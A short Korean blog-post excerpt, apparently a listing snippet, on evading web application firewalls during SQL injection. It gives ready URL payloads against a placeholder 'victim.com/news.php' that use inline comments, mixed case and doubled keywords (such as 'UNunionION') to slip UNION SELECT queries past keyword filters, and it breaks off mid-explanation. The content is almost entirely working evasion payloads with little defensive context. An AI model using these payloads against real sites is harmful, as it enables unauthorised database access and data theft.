SQL Injection WAF 우회기법 ▶ WAF 기본 우회기법 (1) 주석처리 방법 : 1 2 3 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3..... http://victim.com/news.php?id=1+/*!union*/ /*!select*/ 1,2,3,4…. cs (2) 대소문자 교체 방법 : 1 http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... cs (3) 단어 대체 방법 : 방화벽에서 SQL 키워드를 제거하는 방식을 사용할 때 1 2 http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- (어떤 WAF는 소문자 "union"과 "select"를 제거하게 .. 2022. 11. 21. 이전 1 다음
